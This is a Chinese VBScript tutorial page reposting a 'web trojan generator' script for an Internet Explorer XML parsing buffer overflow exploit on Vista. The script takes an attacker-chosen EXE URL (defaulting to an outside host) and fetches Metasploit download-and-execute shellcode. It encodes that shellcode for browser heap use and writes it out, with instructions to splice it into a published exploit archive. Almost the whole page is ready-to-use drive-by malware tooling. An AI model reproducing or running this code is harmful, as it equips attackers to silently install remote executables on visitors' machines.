当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > 网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

VBScript
vbs删除注册表项的代码
用vbs检查注册表项的访问权限的代码
vbs之使用Internet Explorer 屏蔽密码
vbscript 注册表脚本书写
vbs下通过日期查找文件夹的代码
vbs复制文件的脚本
vbs实现计算机重启
文件备份vbs脚本
vbs下用一个小方法实现批量添加域用户
用vbs实现本地添加用户的脚本
vbs AD日志开启脚本nableKerbLog的脚本
vbs实现压缩文件夹的脚本
用VBS修改远程桌面3389端口并添加到Windows防火墙的代码
用vbs实现自动检查代理是否可用,并自动设置IE代理的脚本
vbs实现的定时关机、重启的脚本和程序
vbs实现的定时提醒你休息的脚本
vbs自动填表单分析附源码
vbs实现的汉字转拼音的函数
初窥WMI_Vbs脚本编程简明教程补充读物
用vbs实现判断计算机是笔记本还是台式机的代码

VBScript 中的 网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-12   浏览: 218 ::
收藏到网摘: n/a

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day利用代码 'code by lcx
On Error Resume Next
Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload"

Body = getHTTPPage(url)
Set Re = New RegExp
Re.Pattern = "(\$shellcode \=[\s\S]+</div></pre>)"
Set Matches = Re.Execute(Body)
If Matches.Count>0 Then Body = Matches(0).value
code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))
function replaceregex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function

Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function
Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function
Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len(vstrIn)
ThisChr = Mid(vStrIn,aaaa,1)
If Abs(Asc(ThisChr)) < &HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode < 0 Then
innerCode = innerCode + &H10000
End If
Hight8 = (innerCode And &HFF00)\ &HFF
Low8 = innerCode And &HFF
strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
End If
Next
URLEncoding = strReturn
End Function
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("a.txt",2,true)
fileS.writeline replaceregex(code)
'fileS.writeline body
wscript.echo replaceregex(code)
files.close
set fso=Nothing
wscript.echo Chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"